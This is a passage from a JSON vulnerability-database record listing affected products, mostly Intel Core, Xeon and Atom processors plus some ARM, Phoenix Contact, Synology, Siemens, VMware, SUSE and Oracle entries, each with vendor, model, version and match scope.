        "model": "xeon e3 1278l v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon platinum",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8160f"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4702hq"
      },
      {
        "model": "xeon e5 2620",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6144"
      },
      {
        "model": "atom x3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3200rk"
      },
      {
        "model": "xeon e3 1240 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core m5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6y54"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3210"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4350t"
      },
      {
        "model": "xeon phi",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7210f"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3130m"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3615qm"
      },
      {
        "model": "core m",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5y10a"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x5570"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "870s"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2405s"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3550s"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x5660"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4640_v4"
      },
      {
        "model": "xeon e5 2643 v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4010y"
      },
      {
        "model": "xeon platinum",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8153"
      },
      {
        "model": "atom x3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3130"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4830_v4"
      },
      {
        "model": "vl2 ppc 1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3689y"
      },
      {
        "model": "xeon e3 1270",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2680_v3"
      },
      {
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3708"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "840qm"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4610_v4"
      },
      {
        "model": "cortex-a57",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "arm",
        "version": null
      },
      {
        "model": "bl ppc15 3000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "model": "xeon e3 1245 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e5 2408l v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c2358"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2710qe"
      },
      {
        "model": "pentium n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n3540"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8891_v4"
      },
      {
        "model": "xeon e5 2428l v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e5 2650l v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6100t"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "560m"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2375m"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4200h"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x7542"
      },
      {
        "model": "vs960hd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "synology",
        "version": null
      },
      {
        "model": "cortex-a9",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "arm",
        "version": null
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4620"
      },
      {
        "model": "xeon e5 2640",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4810mq"
      },
      {
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n2920"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4830"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4210h"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4360t"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4340"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "370m"
      },
      {
        "model": "xeon e5 1680 v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4112e"
      },
      {
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n3060"
      },
      {
        "model": "cortex-a78ae",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "arm",
        "version": null
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2697a_v4"
      },
      {
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6152"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "680"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5350h"
      },
      {
        "model": "xeon e3 1220l v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4607"
      },
      {
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3745"
      },
      {
        "model": "xeon e5 2428l",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e5640"
      },
      {
        "model": "xeon e5 2637 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2677m"
      },
      {
        "model": "dl ppc18.5m 7000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5500u"
      },
      {
        "model": "xeon e3 1240 v6",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4617"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4667_v4"
      },
      {
        "model": "xeon e3 1275 v6",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e3 1225",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6600k"
      },
      {
        "model": "xeon e3 1275l v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "975"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4000m"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "920"
      },
      {
        "model": "skynas",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "synology",
        "version": null
      },
      {
        "model": "xeon e5 2637 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8893_v2"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x3450"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3610qm"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2680_v2"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4402e"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6600"
      },
      {
        "model": "xeon e5 2650 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon platinum",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8164"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "l5530"
      },
      {
        "model": "simatic itc1900",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "3.1"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2697_v4"
      },
      {
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3808"
      },
      {
        "model": "xeon platinum",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8158"
      },
      {
        "model": "atom x7-e3950",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "bl bpc 2001",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "model": "local service management system",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "13.3"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4460t"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4260u"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4650_v2"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6360u"
      },
      {
        "model": "xeon e3 1220 v5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2683_v3"
      },
      {
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3538"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2760qm"
      },
      {
        "model": "pentium n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n3710"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2300"
      },
      {
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3775"
      },
      {
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c2508"
      },
      {
        "model": "atom x3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3445"
      },
      {
        "model": "xeon phi",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7235"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "w3670"
      },
      {
        "model": "xeon silver",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4114"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4690s"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4710mq"
      },
      {
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3735e"
      },
      {
        "model": "cortex-a73",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "arm",
        "version": null
      },
      {
        "model": "xeon platinum",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8170m"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x5680"
      },
      {
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z2460"
      },
      {
        "model": "xeon e5 2620 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "dl ppc15m 7000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8860_v4"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3610me"
      },
      {
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6130t"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3475s"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8600k"
      },
      {
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3775d"
      },
      {
        "model": "xeon e3 1125c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4005u"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2610ue"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7820hq"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3517ue"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2870_v2"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4330t"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4210y"
      },
      {
        "model": "xeon e5 2648l v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e3 1275",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2700k"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4600u"
      },
      {
        "model": "xeon e5 1650 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e5 2450 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "cortex-a77",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "arm",
        "version": null
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4310u"
      },
      {
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6138f"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "860s"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3115c"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "660lm"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4785t"
      },
      {
        "model": "xeon e3 1230l v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8870"
      },
      {
        "model": "workstation",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "vmware",
        "version": "12.5.8"
      },
      {
        "model": "xeon e3 1270 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4288u"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2637m"
      },
      {
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3570"
      },
      {
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c2316"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2125"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3330s"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4590t"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6600t"
      },
      {
        "model": "core m",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5y70"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "l5609"
      },
      {
        "model": "xeon e5 2609",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e5 2630 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e5 2630l v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "1558l_v5"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2629m"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5600u"
      },
      {
        "model": "xeon bronze 3106",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "980x"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4760hq"
      },
      {
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3770d"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "460m"
      },
      {
        "model": "celeron j",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "j3355"
      },
      {
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6126t"
      },
      {
        "model": "vl2 ppc 3000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3590"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4350"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5700hq"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2600k"
      },
      {
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c2516"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4210m"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x5677"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4110m"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8890_v4"
      },
      {
        "model": "bl rackmount 2u",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e5502"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e5620"
      },
      {
        "model": "xeon e5 2440 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6128"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3210m"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4770r"
      },
      {
        "model": "xeon platinum",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8176"
      },
      {
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3858"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4650_v4"
      },
      {
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n4100"
      },
      {
        "model": "linux enterprise server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "11"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6300hq"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e5606"
      },
      {
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z2580"
      },
      {
        "model": "vl ipc p7000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "model": "xeon e5 2623 v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4500u"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4770te"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3615qe"
      },
      {
        "model": "xeon e3 1290",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core m",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5y31"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7560u"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5950hq"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2698_v3"
      },
      {
        "model": "pentium j",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "j4205"
      },
      {
        "model": "leap",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "opensuse",
        "version": "42.2"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "640lm"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2880_v2"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2667_v4"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4200u"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "w5590"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4170t"
      },
      {
        "model": "xeon e5 2450l v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3360m"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4310m"
      },
      {
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3558"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "450m"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6300"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4700hq"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4628l_v4"
      },
      {
        "model": "xeon e5 1620 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2870"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8894_v4"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2130"
      },
      {
        "model": "xeon e3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "1545m_v5"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4610_v2"
      },
      {
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6140m"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2630qm"
      },
      {
        "model": "xeon e3 1240 v5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "atom x5-e3930",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e5 2637 v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2102"
      },
      {
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c2750"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4590s"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2510e"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6320"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2860qm"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4660_v3"
      },
      {
        "model": "diskstation manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "synology",
        "version": "6.2.2-24922"
      },
      {
        "model": "el ppc 1000\\/m",
        "scope": "eq",
